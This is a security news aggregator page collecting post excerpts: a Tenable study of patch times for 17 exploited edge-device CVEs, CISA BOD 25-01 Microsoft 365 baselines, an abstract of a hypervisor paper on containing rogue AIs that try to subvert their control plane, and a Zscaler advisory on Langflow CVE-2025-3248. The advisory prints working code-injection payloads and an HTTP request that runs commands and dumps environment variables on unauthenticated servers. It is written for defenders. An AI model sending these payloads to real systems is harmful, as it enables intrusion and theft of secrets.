Security Boulevard

via the inimitable Daniel Stori at turnoff.us

via the inimitable Daniel Stori at turnoff.us (Extra_Panel)

Permalink

The post Daniel Stori’s Turnoff.US: ‘Python Robots’ appeared first on Security Boulevard.

The only way to assess AI bot protection? Measure both false positives and false negatives. Anything less risks security gaps or user disruption.

The post No Hidden Trade-Offs: Why Measuring False Positives & Negatives Is the Only Way to Assess AI Bot Protection appeared first on Security Boulevard.

Interesting research: “Guillotine: Hypervisors for Isolating Malicious AIs.”

Abstract:As AI models become more embedded in critical sectors like finance, healthcare, and the military, their inscrutable behavior poses ever-greater risks to society. To mitigate this risk, we propose Guillotine, a hypervisor architecture for sandboxing powerful AI models—models that, by accident or malice, can generate existential threats to humanity. Although Guillotine borrows some well-known virtualization techniques, Guillotine must also introduce fundamentally new isolation mechanisms to handle the unique threat model posed by existential-risk AIs. For example, a rogue AI may try to introspect upon hypervisor software or the underlying hardware substrate to enable later subversion of that control plane; thus, a Guillotine hypervisor requires careful co-design of the hypervisor software and the CPUs, RAM, NIC, and storage devices that support the hypervisor software, to thwart side channel leakage and more generally eliminate mechanisms for AI to exploit reflection-based vulnerabilities. Beyond such isolation at the software, network, and microarchitectural layers, a Guillotine hypervisor must also provide physical fail-safes more commonly associated with nuclear power plants, avionic platforms, and other types of mission critical systems. Physical fail-safes, e.g., involving electromechanical disconnection of network cables, or the flooding of a datacenter which holds a rogue AI, provide defense in depth if software, network, and microarchitectural isolation is compromised and a rogue AI must be temporarily shut down or permanently destroyed. ...

The post Regulating AI Behavior with a Hypervisor appeared first on Security Boulevard.

Bacon Redux: Pig butchering and other serious scams still thriving, despite crackdowns in Dubai and Myanmar

The post Asian Scam Farms: ‘Industrial Scale,’ Warns UN Report appeared first on Security Boulevard.

Authors/Presenters: Kirill Efimov, Eitan Worcel

Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organizations YouTube channel.

Permalink

The post BSidesLV24 – Common Ground – Don’t Make This Mistake: Painful Learnings Of Applying Ai In Security appeared first on Security Boulevard.

When Skybox Security shut down, it raised real concerns for me, not just about employment, but about how the situation could affect the professional credibility I’ve built over nearly 25...

The post From Stranded to Supported: Helping My Customers Land Safely with FireMon appeared first on Security Boulevard.

Tel Aviv, Israel, 23rd April 2025, CyberNewsWire

The post Lattica Emerges from Stealth to Solve AI’s Biggest Privacy Challenge with FHE appeared first on Security Boulevard.

Delinea today extended the reach of its platform for securing identities and credentials to now provide support for artificial intelligence (AI) agents.

The post Delinea Adds Ability to Secure AI Agent Identities appeared first on Security Boulevard.

By performing a cryptographic key assessment (CKA), developing a PQC encryption strategy and prioritizing cryptoagility, organizations can prepare for quantum computing cyberthreats. 

The post Post-Quantum Cryptography: Defending Against Tomorrow’s Threats Today appeared first on Security Boulevard.

Custom-Crafted, Qantas-Spoofing Emails Target Australian Victims

The post Custom-Crafted, Qantas-Spoofing Emails Target Australian Victims appeared first on Security Boulevard.

The 2025 Verizon Data Breach Investigations Report (DBIR) reveals that vulnerability exploitation was present in 20% of breaches — a 34% increase year-over-year. To support the report, Tenable Research contributed enriched data on the most exploited vulnerabilities. In this blog, we analyze 17 edge-related CVEs and remediation trends across industry sectors.

Background

Since 2008, Verizon’s annual Data Breach Investigations Report (DBIR) has helped organizations understand evolving cyber threats. For the 2025 edition, Tenable Research contributed enriched data on the most exploited vulnerabilities of the past year. We analyzed over 160 million data points and zeroed-in on the 17 edge device CVEs featured in the DBIR to understand their average remediation times. In this blog, we take a closer look at these vulnerabilities, revealing industry-specific trends and highlighting where patching still lags — often by months.

In this year’s DBIR, vulnerabilities in Virtual Private Networks (VPNs) and edge devices were particular areas of concern, accounting for 22% of the CVE-related breaches in this year’s report, almost eight times the amount of 3% found in the 2024 report.

Analysis

The 2025 DBIR found that exploitation of vulnerabilities surged to be one of the top initial access vectors for 20% of data breaches. This represents a 34% increase over last year’s report and is driven in part by the zero-day exploitation of VPN and edge device vulnerabilities – asset classes that traditional endpoint detection and response (EDR) vendors struggle to assess effectively. The DBIR calls special attention to 17 CVEs affecting these edge devices, which remain valuable targets for attackers. Tenable Research analyzed these 17 CVEs and evaluated which industries had the best and worst remediation rates across the vulnerabilities. As a primer, the table below provides this list of CVEs and details for each, including their Common Vulnerability Scoring System (CVSS) and Tenable Vulnerability Priority Rating (VPR) scores. It’s worth noting that each of these CVEs was added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) list in 2024.

CVE Description CVSSv3 VPR Tenable Blog CVE-2024-20359 Cisco ASA and FTD Software Persistent Local Code Execution Vulnerability 6.0 6.7 CVE-2024-20353, CVE-2024-20359: Frequently Asked Questions About ArcaneDoor CVE-2023-6548 Citrix NetScaler ADC and Gateway Authenticated Remote Code Execution (RCE) Vulnerability 8.8 7.4 CVE-2023-6548, CVE-2023-6549: Zero-Day Vulnerabilities Exploited in Citrix NetScaler ADC and NetScaler Gateway CVE-2023-6549 Citrix NetScaler ADC and Gateway Denial of Service Vulnerability 7.5 5.1 CVE-2023-48788 FortiClient Enterprise Management Server (FortiClientEMS) SQL Injection Vulnerability 9.8 9.4 CVE-2023-48788: Critical Fortinet FortiClientEMS SQL Injection Vulnerability CVE-2024-21762 Fortinet FortiOS Out-of-bound Write Vulnerability in sslvpnd 9.8 7.4 CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability CVE-2024-23113 Fortinet FortiOS Format String Vulnerability 9.8 7.4 CVE-2024-47575 FortiManager Missing Authentication in fgfmsd Vulnerability (FortiJump) 9.8 9.6 CVE-2024-47575: Frequently Asked Questions About FortiJump Zero-Day in FortiManager and FortiManager Cloud CVE-2023-46805 Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass Vulnerability 8.2 6.7 CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways CVE-2024-21887 Ivanti Connect Secure and Ivanti Policy Secure Command Injection Vulnerability 9.1 9.8 CVE-2024-21893 Ivanti Connect Secure, Ivanti Policy Secure and Ivanti Neurons for ZTA Server-Side Request Forgery (SSRF) Vulnerability 8.2 7.2 CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893: Frequently Asked Questions for Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways CVE-2023-36844 Juniper Networks Junos OS PHP External Variable Modification Vulnerability 5.3 2.9 Exploit Chain Targets Unpatched Juniper EX Switches and SRX Firewalls CVE-2023-36845 Juniper Networks Junos OS PHP External Variable Modification Vulnerability 9.8 8.4 CVE-2023-36846 Juniper Networks Junos OS Missing Authentication Vulnerability 5.3 2.9 CVE-2023-36847 Juniper Networks Junos OS Missing Authentication Vulnerability 5.3 2.9 CVE-2023-36851 Juniper Networks Junos OS Missing Authentication Vulnerability 5.3 2.9 CVE-2024-3400 Command Injection Vulnerability in the GlobalProtect Gateway feature of PAN-OS 10.0 10 CVE-2024-3400: Zero-Day Vulnerability in Palo Alto Networks PAN-OS GlobalProtect Gateway Exploited in the Wild CVE-2024-40766 SonicWall SonicOS Management Access and SSLVPN Improper Access Control Vulnerability 9.8 7.4  

*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on April 23 and reflects VPR at that time.

Tenable Research Analyzes Edge CVE Remediation Trends

Featured prominently in the DBIR, these 17 edge device CVEs were further analyzed by Tenable Research and are organized by vendor with each chart below consisting of CVEs fixed in the same patch release. To understand remediation efforts from Tenable’s telemetry data, we analyzed the average time in days for remediation of these vulnerabilities. The charts shown below spotlight the three industries that had the shortest average time to remediate each vulnerability as well as the three sectors that took the longest amount of time to remediate.

Cisco

CVE-2024-20359 was highlighted in April 2024 by Cisco Talos as one of two known vulnerabilities being exploited by an advanced persistent threat (APT) actor labeled as UAT4356 by Talos and STORM-1849 by the Microsoft Threat Intelligence Center. The flaw was used as part of an espionage campaign known as ArcaneDoor. From our analysis, we found that the education, energy and utilities, and shipping and transportation industries had the longest average remediation time for this vulnerability. CVE-2024-20359 was added to the CISA KEV list on April 24, 2024; the same date Cisco Talos released its research on ArcaneDoor. This KEV addition had a due date of seven days for federal civilian executive branch (FCEB) agencies, which are mandated by Binding Operational Directive (BOD) 22-01. Despite this short patch window, we see that the government sector had a surprisingly high average remediation rate of 116 days. While this is well outside the KEV due date, government was one of the three industries with the fastest average remediation rate.

Source: Tenable Research, April 2025

Citrix

CVE-2023-6548 and CVE-2023-6549 are a pair of zero-day vulnerabilities that were exploited against Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway appliances. These vulnerabilities were patched in early January 2024, only months after Citrix addressed CVE-2023-4966, a critical flaw in NetScaler appliances called “CitrixBleed” that was widely exploited by a variety of attackers. While Citrix appliances continue to remain a high value target for attackers, the remediation rates, even amongst the three industries with the shortest average remediation rates, are much higher than we anticipated. The lowest average patch rate observed was 160 days for the consulting industry.

Source: Tenable Research, April 2025

Fortinet

CVE-2024-21762 and CVE-2024-23113 are two critical severity vulnerabilities affecting Fortinet’s FortiOS network operating system. At the time the Fortinet advisory was released for these vulnerabilities, CVE-2024-21762 was listed as “potentially being exploited in the wild.” Just a day later, CISA added it to the KEV list. Similar to the Citrix vulnerabilities above, the average remediation time for these vulnerabilities ranged from 172 days on the low end to over 260 days on the high end. The consulting industry had the longest average remediation rate while the software, internet and technology sector had the shortest at 172 days.

Source: Tenable Research, April 2025

In stark contrast to the Fortinet CVEs above is CVE-2023-48788, a critical SQL injection vulnerability affecting FortiClient Enterprise Management Server (FortiClientEMS). The communications and telecommunications sector led the way with an average remediation rate of only 12 days with healthcare a distant second, with an average of 71 days to remediate the flaw.

Source: Tenable Research, April 2025

Similar to CVE-2023-48788, CVE-2024-47575, a missing authentication vulnerability in FortiManager dubbed “FortiJump,” appears to have been urgently addressed by organizations. Our analysis revealed it had the lowest average remediation rates of the 17 CVEs we examined. Remediation times averaged a week, even for the slowest to patch industries.

Source: Tenable Research, April 2025

Ivanti

Over the last five years, Ivanti’s Connect Secure and Policy Secure have been targeted by a variety of threat actors including ransomware groups and other nation-state aligned threat actors. Unsurprisingly, CVE-2023-46805 and CVE-2024-21887 have been reportedly abused by threat actors in chained attacks to achieve RCE. Additionally, these flaws were exploited as zero-days. From our analysis, even the quickest of industries to remediate these flaws took over 260 days to do so with the highest average just shy of 300 days.

Source: Tenable Research, April 2025

Only a few weeks after patches for CVE-2023-46805 and CVE-2024-21887 were released, Ivanti released a new advisory with additional CVEs, including CVE-2024-21893. While initially it was believed that CVE-2024-21893 was only exploited in limited attacks, Shadowserver reported a major increase in exploit activity hours prior to a public proof-of-concept (PoC) being released. Interestingly this vulnerability saw some differing remediation rates with the biotechnology and chemicals sector being the fastest to patch with an average of nine days for remediation.

Source: Tenable Research, April 2025

Juniper Networks

Next we examined five CVEs from Juniper Networks (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847 and CVE-2023-36851) affecting Junos OS. These vulnerabilities were quickly exploited in a chained attack just days after being disclosed by Juniper Networks, which released its patches on August 17, 2024. While four of the five vulnerabilities had medium severity CVSSv3 scores, chaining these flaws allows for a remote, unauthenticated attacker to execute arbitrary code on unpatched devices. The average remediation rate for these vulnerabilities varied greatly, with food and beverage at over 420 days and shipping and transportation on the low end with an average remediation time of 80 days.

Source: Tenable Research, April 2025

Palo Alto Networks

CVE-2024-3400 is a critical command injection vulnerability affecting the Palo Alto Networks GlobalProtect Gateway feature of PAN-OS that was exploited in the wild as a zero-day. In our dataset, this CVE had a smaller footprint than others examined, yet it shared a similar trend with most industries requiring over 100 days to remediate. The banking, finance and insurance sector performed far better with an average of 45 days to close out this vulnerability.

Source: Tenable Research, April 2025

SonicWall

The final CVE we examined was CVE-2024-40766, a critical improper access control vulnerability in the SonicWall SonicOS management access and SSLVPN. This flaw saw exploitation from ransomware groups, including Fog and Akira, which utilized the vulnerability to gain initial access to their victims' networks. In the case of this SonicWall vulnerability, average remediation rates were low in comparison to the other CVEs we examined, with the slowest sector taking 52 days (consulting) and the fastest (engineering) taking an average of only six days.

Source: Tenable Research, April 2025

Conclusion

The 17 CVEs we examined in our analysis, while only representing a small portion of the CISA KEV, encompass devices that have an elevated risk, due to their placement at the forefront of a network. Despite these being some of the most valuable targets for attackers, our examination of remediation rates show us that there’s still room for improvement across all industry verticals. Known and exploitable vulnerabilities continue to be abused by threat actors, many of which take advantage of readily available exploits. Data has become increasingly valuable and attackers and APT groups alike have zeroed in on the exploits and vulnerabilities that provide and help them maintain access to victim networks. In order to reduce risk and harden your networks, we recommend addressing each of the CVEs discussed in this post as well as reading the Verizon 2025 DBIR to understand the trends and tactics used by threat actors. Security isn’t just for infosec professionals — it’s everyone’s responsibility. The data compiled by Verizon, in collaboration with Tenable, offer valuable insights into today’s modern threat landscape and what you can do to better protect the networks, devices and people you defend.

Identifying affected systems

A list of Tenable plugins for the vulnerabilities discussed in the blog can be found on the individual CVE pages for each of the CVEs listed below. These links will display all available plugins for these vulnerabilities, including upcoming plugins in our Plugins Pipeline.

• CVE-2024-20359
• CVE-2023-6548
• CVE-2023-6549
• CVE-2023-48788
• CVE-2024-21762
• CVE-2024-23113
• CVE-2024-47575
• CVE-2023-46805
• CVE-2024-21887
• CVE-2024-21893
• CVE-2023-36844
• CVE-2023-36845
• CVE-2023-36846
• CVE-2023-36847
• CVE-2023-36851
• CVE-2024-3400
• CVE-2024-40766

Get more information

• Verizon 2025 Data Breach Investigations Report (DBIR)

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

The post Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends appeared first on Security Boulevard.

U.S. government agencies are required to bring their Microsoft 365 cloud services into compliance with a recent Binding Operational Directive. Here’s how Tenable can help.

Overview

Malicious threat actors are constantly targeting cloud environments. The risk of compromise can be reduced by enforcing secure configurations of security controls. With this goal in mind, the Cybersecurity and Infrastructure Security Agency (CISA) created the Secure Cloud Business Applications (SCuBA) project. The SCuBA project currently provides secure configuration baselines for Microsoft 365 and Google Workspace.

In December 2024, as part of the SCuBA project, CISA released a Binding Operational Directive (BOD) 25-01: Implementation Guidance for Implementing Secure Practices for Cloud Services. This directive requires U.S. government agencies and departments in the federal civilian executive branch to implement secure configuration baselines for certain software as a service (SaaS) products.

Scope

The scope of the BOD 25-01 includes all production or operational cloud tenants (operating in or as a federal information system) utilizing Microsoft 365. CISA may release additional SCuBA Secure Configuration Baselines for other cloud products which would fall under the scope of this directive. The complete list of required configurations is available here.

While the CISA BOD 25-01 applies to government agencies, any organization using Microsoft 365 would reduce the risk of compromise by adhering to these baselines.

Required actions

According to BOD 25-01, there are several required actions for in-scope cloud tenant agencies that shall be completed by the following dates:

• February 21, 2025 - following CISA reporting instructions:
  • submit tenant name and system owning agency/component for each tenant
  • submit an updated the inventory annually in the first quarter
• April 25, 2025 - deploy SCuBA assessment tools and begin continuous reporting
• June 20, 2025 - implement all mandatory SCuBA policies identified at BOD 25-01 Required Configurations.

In-scope cloud tenants are also required to:

• Implement all future updates to mandatory SCuBA policies
• Implement all mandatory SCuBA Secure Configuration Baselines and begin continuous monitoring prior to granting an Authorization to Operate for new cloud tenants.

Required configurations

As of March 2025, the following configurations are required for BOD 25-01:

Microsoft 365 (M365) Microsoft Entra ID MS.AAD.1.1v1 Legacy authentication SHALL be blocked. MS.AAD.2.1v1 Users detected as high risk SHALL be blocked. MS.AAD.2.3v1 Sign-ins detected as high risk SHALL be blocked. MS.AAD.3.1v1 Phishing-resistant MFA SHALL be enforced for all users. MS.AAD.3.2v1 If Phishing-resistant MFA has not been enforced yet, then an alternative MFA method SHALL be enforced for all users. MS.AAD.3.3v1 If Phishing-resistant MFA has not been enforced yet and Microsoft Authenticator is enabled, it SHALL be configured to show login context information. MS.AAD.3.4v1 The Authentication Methods Manage Migration feature SHALL be set to Migration Complete. MS.AAD.3.6v1 Phishing-resistant MFA SHALL be required for Highly Privileged Roles. MS.AAD.5.1v1 Only administrators SHALL be allowed to register applications. MS.AAD.5.2v1 Only administrators SHALL be allowed to consent to applications. MS.AAD.5.3v1 An admin consent workflow SHALL be configured for applications. MS.AAD.5.4v1 Group owners SHALL NOT be allowed to consent to applications. MS.AAD.6.1v1 User passwords SHALL NOT expire. MS.AAD.7.1v1 A minimum of two users and a maximum of eight users SHALL be provisioned with the Global Administrator role. MS.AAD.7.2v1 Privileged users SHALL be provisioned with finer-grained roles instead [of] Global Administrator. MS.AAD.7.3v1 Privileged users SHALL be provisioned cloud-only accounts that are separate from an on-premises directory or other federated identity providers. MS.AAD.7.4v1 Permanent active role assignments SHALL NOT be allowed for highly privileged roles except for emergency and service accounts. MS.AAD.7.5v1 Provisioning users to highly privileged roles SHALL NOT occur outside of a PAM system, because this bypasses critical controls the PAM system provides. MS.AAD.7.6v1 Activation of the Global Administrator role SHALL require approval. MS.AAD.7.7v1 Eligible and Active highly privileged role assignments SHALL trigger an alert. MS.AAD.7.8v1 User activation of the Global Administrator role SHALL trigger an alert. Microsoft Defender MS.DEFENDER.1.1v1 The standard and strict preset security policies SHALL be enabled. MS.DEFENDER.1.2v1 All users SHALL be added to Exchange Online Protection in either the standard or strict preset security policy. MS.DEFENDER.1.3v1 All users SHALL be added to Defender for Office 365 Protection in either the standard or strict preset security policy. MS.DEFENDER.1.4v1 Sensitive accounts SHALL be added to Exchange Online Protection in the strict preset security policy. MS.DEFENDER.1.5v1 Sensitive accounts SHALL be added to Defender for Office 365 Protection in the strict preset security policy. MS.DEFENDER.4.1v2 A custom policy SHALL be configured to protect PII and sensitive information, as defined by the agency, blocking at a minimum: credit card numbers, U.S. Individual Taxpayer Identification Numbers (ITINs), and U.S. Social Security numbers (SSNs). MS.DEFENDER.5.1v1 At a minimum, the alerts required by the CISA M365 Secure Configuration Baseline for Exchange Online SHALL be enabled. MS.DEFENDER.6.1v1 Microsoft Purview Audit (Standard) logging SHALL be enabled. MS.DEFENDER.6.2v1 Microsoft Purview Audit (Premium) logging SHALL be enabled for ALL users. Exchange Online MS.EXO.1.1v1 Automatic forwarding to external domains SHALL be disabled. MS.EXO.2.2v2 An SPF policy SHALL be published for each domain that fails all non-approved senders. MS.EXO.4.1v1 A DMARC policy SHALL be published for every second-level domain. MS.EXO.4.2v1 The DMARC message rejection option SHALL be p=reject. MS.EXO.4.3v1 The DMARC point of contact for aggregate reports SHALL include [email protected]. MS.EXO.5.1v1 SMTP AUTH SHALL be disabled. MS.EXO.6.1v1 Contact folders SHALL NOT be shared with all domains. MS.EXO.6.2v1 Calendar details SHALL NOT be shared with all domains. MS.EXO.7.1v1 External sender warnings SHALL be implemented. MS.EXO.13.1v1 Mailbox auditing SHALL be enabled. Power Platform MS.POWERPLATFORM.1.1v1 The ability to create production and sandbox environments SHALL be restricted to admins. MS.POWERPLATFORM.1.2v1 The ability to create trial environments SHALL be restricted to admins. MS.POWERPLATFORM.2.1v1 A DLP policy SHALL be created to restrict connector access in the default Power Platform environment. MS.POWERPLATFORM.3.1v1 Power Platform tenant isolation SHALL be enabled. SharePoint Online and OneDrive MS.SHAREPOINT.1.1v1 External sharing for SharePoint SHALL be limited to Existing Guests or Only People in your Organization. MS.SHAREPOINT.1.2v1 External sharing for OneDrive SHALL be limited to Existing Guests or Only People in your Organization. MS.SHAREPOINT.2.1v1 File and folder default sharing scope SHALL be set to Specific People (only the people the user specifies). MS.SHAREPOINT.2.2v1 File and folder default sharing permissions SHALL be set to View only. Microsoft Teams MS.TEAMS.1.2v1 Anonymous users SHALL NOT be enabled to start meetings. MS.TEAMS.2.1v1 External access for users SHALL only be enabled on a per-domain basis. MS.TEAMS.2.2v1 Unmanaged users SHALL NOT be enabled to initiate contact with internal users. MS.TEAMS.3.1v1 Contact with Skype users SHALL be blocked. MS.TEAMS.4.1v1 Teams email integration SHALL be disabled. Additional configurations

In addition to the required configurations, the following configurations can also be evaluated:

Microsoft 365 (M365) Microsoft Entra ID MS.AAD.2.2v1 A notification SHOULD be sent to the administrator when high-risk users are detected. MS.AAD.3.7v1 Managed devices SHOULD be required for authentication. MS.AAD.3.8v1 Managed Devices SHOULD be required to register MFA. MS.AAD.7.9v1 User activation of other highly privileged roles SHOULD trigger an alert. MS.AAD.8.1v1 Guest users SHOULD have limited or restricted access to Microsoft Entra ID directory objects. MS.AAD.8.2v1 Only users with the Guest Inviter role SHOULD be able to invite guest users. Microsoft Defender MS.DEFENDER.2.1v1 User impersonation protection SHOULD be enabled for sensitive accounts in both the standard and strict preset policies. MS.DEFENDER.2.2v1 Domain impersonation protection SHOULD be enabled for domains owned by the agency in both the standard and strict preset policies. MS.DEFENDER.2.3v1 Domain impersonation protection SHOULD be added for important partners in both the standard and strict preset policies. MS.DEFENDER.3.1v1 Safe attachments SHOULD be enabled for SharePoint, OneDrive, and Microsoft Teams. MS.DEFENDER.4.2v1 The custom policy SHOULD be applied to Exchange, OneDrive, SharePoint, Teams chat, and Devices. MS.DEFENDER.4.3v1 The action for the custom policy SHOULD be set to block sharing sensitive information with everyone. MS.DEFENDER.4.4v1 Notifications to inform users and help educate them on the proper use of sensitive information SHOULD be enabled in the custom policy. Exchange Online MS.EXO.3.1v1 DKIM SHOULD be enabled for all domains. MS.EXO.4.4v1 An agency point of contact SHOULD be included for aggregate and failure reports. MS.EXO.12.1v1 IP allow lists SHOULD NOT be created. MS.EXO.12.2v1 Safe lists SHOULD NOT be enabled. Power Platform MS.POWERPLATFORM.2.2v1 Non-default environments SHOULD have at least one DLP policy affecting them. MS.POWERPLATFORM.5.1v1 The ability to create Power Pages sites SHOULD be restricted to admins. SharePoint Online and OneDrive MS.SHAREPOINT.1.3v1 External sharing SHALL be restricted to approved external domains and/or users in approved security groups per interagency collaboration needs. MS.SHAREPOINT.3.1v1 Expiration days for Anyone links SHALL be set to 30 days or less. MS.SHAREPOINT.3.2v1 The allowable file and folder permissions for links SHALL be set to View only. MS.SHAREPOINT.3.3v1 Reauthentication days for people who use a verification code SHALL be set to 30 days or less. Microsoft Teams MS.TEAMS.1.1v1 External meeting participants SHOULD NOT be enabled to request control of shared desktops or windows. MS.TEAMS.1.3v1 Anonymous users and dial-in callers SHOULD NOT be admitted automatically. MS.TEAMS.1.4v1 Internal users SHOULD be admitted automatically. MS.TEAMS.1.5v1 Dial-in users SHOULD NOT be enabled to bypass the lobby. MS.TEAMS.1.6v1 Meeting recording SHOULD be disabled. MS.TEAMS.1.7v1 Record an event SHOULD be set to Organizer can record. MS.TEAMS.2.3v1 Internal users SHOULD NOT be enabled to initiate contact with unmanaged users. MS.TEAMS.5.1v1 Agencies SHOULD only allow installation of Microsoft apps approved by the agency. MS.TEAMS.5.2v1 Agencies SHOULD only allow installation of third-party apps approved by the agency. MS.TEAMS.5.3v1 Agencies SHOULD only allow installation of custom apps approved by the agency. How Tenable can help

Tenable Vulnerability Management and Nessus customers can audit the posture of their Microsoft 365 environment with the CISA SCuBA for Microsoft 365 audit files:

• CISA SCuBA Microsoft 365 Entra ID
• CISA SCuBA Microsoft 365 Defender
• CISA SCuBA Microsoft 365 Exchange Online
• CISA SCuBA Microsoft 365 Power Platform
• CISA SCuBA Microsoft 365 SharePoint Online OneDrive
• CISA SCuBA Microsoft 365 Teams

More details for configuring your SCuBA Microsoft 365 environment for Compliance Auditing are available at Configure Azure for a Compliance Audit.

The post CISA BOD 25-01 Compliance: What U.S. Government Agencies Need to Know appeared first on Security Boulevard.

How Can Secure NHI Lifecycle Management Drive Innovation? Do we ever ponder the security of our machine identities? This question becomes increasingly pertinent as more organizations rely on cloud-based platforms for their operations. These are often a fertile playground for Non-Human Identities (NHIs), which play a critical role. But how does secure NHI management foster […]

The post Driving Innovation through Secure NHI Lifecycle Management appeared first on Entro.

The post Driving Innovation through Secure NHI Lifecycle Management appeared first on Security Boulevard.

How Can Budget-Friendly Secrets Management Boost Your Cybersecurity Strategy? Navigating vast of cybersecurity can often seem like attempting to solve an intricate puzzle. One key piece that often gets overlooked is the management of Non-Human Identities (NHIs) and their associated secrets. Despite their significance, finding a cost-effective solution to handle this crucial aspect of your […]

The post Secrets Management Solutions That Fit Your Budget appeared first on Entro.

The post Secrets Management Solutions That Fit Your Budget appeared first on Security Boulevard.

Is Your Travel Sector Business Harnessing the Power of NHI Management? Every industry faces its unique set of challenges when it comes to guaranteeing cybersecurity. However, the travel sector, with its immense data volumes and complex, interconnected frameworks, is at a higher risk. To stay confident, organizations need to pay closer attention to NHI Management […]

The post Travel Sector: Stay Confident with NHI Management appeared first on Entro.

The post Travel Sector: Stay Confident with NHI Management appeared first on Security Boulevard.

Why Should Tech Leaders Place Their Trust in Cloud-Native Security? Let’s ask another question: What better assurance for tech leaders than a robust system that offers comprehensive end-to-end protection? This is precisely what cloud-native security does, and why it is gaining traction. Cloud-native security, with its focus on non-human identities (NHIs) and secrets security management, […]

The post Cloud-Native Security: Assurance for Tech Leaders appeared first on Entro.

The post Cloud-Native Security: Assurance for Tech Leaders appeared first on Security Boulevard.

Steve Carter discusses the evolution of the vulnerability management market, as well as where vulnerability management has failed and why the next phase has to center around automation and scale. The problem, as Carter sees it, is deceptively simple: Organizations are drowning in vulnerabilities but still can’t prioritize or fix them quickly. Scanners can identify..

The post The Evolution of Vulnerability Management with Steve Carter appeared first on Security Boulevard.

Shrav Mehta explores lessons from 2024’s costliest data breaches and provides actionable protection strategies for 2025. Shrav and Alan analyze the current cybersecurity landscape and discuss how businesses can strengthen their defenses.  Compliance has always been a pain point for engineering teams—tedious, expensive, and often disconnected from real-time security practices. Shrav discusses the shift away..

The post Actionable Protection Strategies for 2025 with Shrav Mehta appeared first on Security Boulevard.

Author/Presenter: Laura Johnson

Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organizations YouTube channel.

Permalink

The post BSidesLV24 – Common Ground – Cyber Harassment: Stop The Silence, Save Lives appeared first on Security Boulevard.

IntroductionCVE-2025-3248, a critical remote code execution (RCE) vulnerability with a CVSS score of 9.8, has been discovered in Langflow, an open-source platform for visually composing AI-driven agents and workflows. The issue resides in the platform’s /api/v1/validate/code endpoint, which improperly invokes Python’s built-in exec() function on user-supplied code without authentication or sandboxing. This flaw allows attackers to exploit the API and execute arbitrary commands on the server, thus posing a significant risk to organizations using Langflow in their AI development workflows.RecommendationsUpgrade immediately: Users should upgrade to Langflow 1.3.0 or later, where the /api/v1/validate/code endpoint requires authentication.Restrict access: Limit exposure by placing Langflow behind a ZTNA architecture like Zscaler Private Access™ (ZPA) with AppProtection.Implement input sandboxing: If custom validation is needed, avoid using the exec() function with untrusted code or employ sandboxing mechanisms.Monitor and alert: Use detection to flag anomalous requests to validation endpoints and unexpected outgoing connections.Affected VersionsAll Langflow versions prior to 1.3.0 are susceptible to code injection.Vulnerability DetailsLangflow's /api/v1/validate/code endpoint contains a vulnerability in its handling of user-submitted code. In versions prior to 1.3.0, the application uses Python’s compile and exec() to validate function definitions by parsing it into an Abstract Syntax Tree (AST) and processing specific components. The steps include:Parsing the code field using ast.parse().Importing specified modules.Executing function definitions (ast.FunctionDef) to validate their structure.The issue arises from Python’s behavior during function definition, where decorators and default argument values are evaluated immediately. Malicious code embedded in these areas executes during AST processing, enabling attackers to achieve unauthenticated RCE by submitting payloads to the endpoint. The lack of authentication or sandboxing allows exploitation without restriction.An overview of the attack chain is shown below:Figure 1: Attack chain illustrating the progression of exploitation for CVE-2025-3248.How It WorksExploiting CVE-2025-3248 involves the following steps:1. The attacker locates a publicly accessible or an internal Langflow instance (using compromised credentials) running a vulnerable version (prior to 1.3.0).2. The attacker embeds malicious code into either:a. Decorators: Malicious logic placed within a decorator is executed as soon as the AST is processed. In the example below, Here, the exec() invokes an arbitrary command (e.g., to write the system’s id output to a file), which executes immediately when the code is passed to the endpoint. @exec("import os; os.system('id %26gt; /tmp/pwned')")
def foo():
passb. Default function arguments: The attacker can also embed malicious commands into default argument values, which are evaluated at function definition time. In the example below, the payload causes the exec() to retrieve environment variables during AST processing, but the payload can also be used to perform malicious actions.def foo(cmd=exec("__import__('subprocess').check_output(['env'])")):
pass3. The attacker sends the payload to Langflow’s /api/v1/validate/code endpoint via a POST request. Below is an example request that writes a file to the server: POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 172
{
"code": "@exec(\"with open('hacked.txt', 'w') as f: f.write('This server is vulnerable')\")
def foo():
pass"
}4. When the server processes the payload, the embedded code is executed immediately during validation. An example response is shown below:HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 63
{
"imports": {"errors": []},
"function": {"errors": []}
}Although the response appears benign, the malicious payload has already succeeded in executing and writing to a file named hacked.txt on the server. This same process could also easily be used to write a web shell to the server to facilitate remote access.ConclusionCVE-2025-3248 highlights the risks of executing dynamic code without secure authentication and sandboxing measures. This vulnerability serves as a critical reminder for organizations to approach code-validation features with caution, particularly in applications exposed to the internet. Zscaler ThreatLabz encourages organizations to follow the recommendations outlined in this blog.Zscaler CoverageThe Zscaler ThreatLabz team has deployed protection for CVE-2025-3248.Zscaler Private Access AppProtection932200: RCE Bypass TechniqueDetails related to these signatures can be found in the Zscaler Threat Library.

The post CVE-2025-3248: RCE vulnerability in Langflow appeared first on Security Boulevard.